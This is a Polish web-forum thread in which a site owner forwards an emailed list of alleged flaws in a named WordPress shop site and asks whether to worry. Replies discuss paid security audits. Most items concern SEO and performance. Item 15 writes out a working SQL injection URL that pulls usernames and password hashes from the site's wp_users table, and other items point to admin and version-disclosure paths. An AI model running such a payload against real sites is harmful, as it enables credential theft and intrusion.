Witam.
Czy jestescie w stanie zweryfikowac ponizsze uwagi, dotyczace bezpieczenstwa witryny http://www.romero.com.pl ?
Ktos przeslal maila, a w nim takie oto informacje (jest sie czym przejmowac?).
1. http://www.xxx.romero.com.pl
http://www.romero.com.pl/?page_id=-1
2. Sciezka nawigacyjna nie dziala jak nalezy.
Po wybraniu z menu bocznego kategorii "Drobny sprzet masarski", a nastepnie "kloce masarskie i krajalnice" 'breadcrumbs' nie wskazuja niczego, a powinno to sie prezentowac mniej wiecej tak: :: Drobny sprzet masarski :: kloce masarskie i krajalnice.
Ponadto po wyborze kategorii produktow zawsze 'breadcrumbs' wskazuja nazwe produktu pierwszego na liscie, zamiast stosownych nazw kategorii
3. Brak tagow title oraz alt dla wiekszosci grafik umieszczonych na stronie - wplywa to ujemnie na pozycje w wyszukiwarkach.
4. Brak optymalizacji oraz "Leverage browser caching - expiration" dla grafik pochodzacych z templatki - wp-includes/themes/klient/
Przykladowo plik graficzny http://www.romero.com.pl/wp-content/themes...es/menuBtn2.png
powinien byc zoptymalizowany do takiej postaci:
http://gtmetrix.com/reports/romero.com.pl/...8187767ab66.png
5. Strona nie jest w nalezyty sposob zoptymalizowana pod katem wydajnosci - http://gtmetrix.com/reports/romero.com.pl/v1Oa2cNO
6. Brak stosownej informacji, gdy uzytkownik wylaczy obsluge JavaScript w swojej przegladarce.
7. http://www.romero.com.pl/author/admin/
8. site:romero.com.pl/author/admin/
Wyszukiwarka Google zaindeksowala administratora systemu
9. http://www.romero.com.pl/wp-includes/themes/klient/page.php
10. Brak poprawnej walidacji HTML, CSS
11. Zbyt latwy dostep do panelu administratora, jak rowniez formularza odzyskiwania hasla.
Dopisujac do nazwy domeny wp-admin naszym oczom ukazuje sie formularz, ktory moze stac sie w latwy sposob celem atakow typu Brute Force.
Ponadto mozna przy uzyciu skanera exploitow dokonywac zmian w adresie url, co w konsekwencji moze prowadzic do zmian w bazie danych: http://www.romero.com.pl/wp-login.php?acti...amp;login=admin
12. Brak odpowiednich wpisow w pliku .htaccess, blokujacych potencjalnie niebezpieczne boty.
13. Nie ma zabezpieczenia kluczowych folderow przed indeksacja - robots.txt, istnieje rowniez mozliwosc dostepu z zewnatrz do katalogu wp-admin.
14. Możliwosc ataku na witryne poprzez cookies sluzace do uwierzytelniania oraz XSS.
15. Atak typu SQL Injection jest mozliwy - http://www.romero.com.pl/?page_id=-1 union select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30
,31,32,33,34,35,36,37,38,39,40 from wp_users
16. Brak blokady dla katalogu skorek: http://romero.com.pl/wp-content/themes/klient/
17. Po instalacji CMS Wordpress nie wykasowano nastepujacych plikow:
http://www.romero.com.pl/license.txt
http://www.romero.com.pl/readme.html
18. Nie ma blokady dla katalogu wp-includes, mozna wyswietlic zawartosc dokumentu:
http://www.romero.com.pl/wp-includes/version.php
19. Zainstalowane wtyczki sa nieaktualne, jak rowniez sam CMS Wordpress. W tej chwili na serwerze jest zainstalowana wersja 3.7.3 (http://www.romero.com.pl/readme.html), podczas gdy aktualnie obowiazuje wersja 3.9.1.
Pełna wersja: Luki w bezpieczenstwie na stronie
Za audyty się płaci grube pieniążki 
Cóż, firmy próbują w ten sposób zarobić, wyhaczają błedy i starają się zyskać klienta 
To niczym politycy w rzadzie, jedni drugim błędy wytykają by zyskać władze. Tak jak kolega napisał wyżej, trzeba za to grube pieniązki zapłacić 
To niczym politycy w rzadzie, jedni drugim błędy wytykają by zyskać władze. Tak jak kolega napisał wyżej, trzeba za to grube pieniązki zapłacić
No to może zamiast popierać rządy które chcą tylko władzy wyjdźcie im na przeciw i róbcie darmowe audyty? Usługa za usługę np? Szybciej klienta zdobędziecie a korzyści też mogą być ciekawe.
No to rób.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.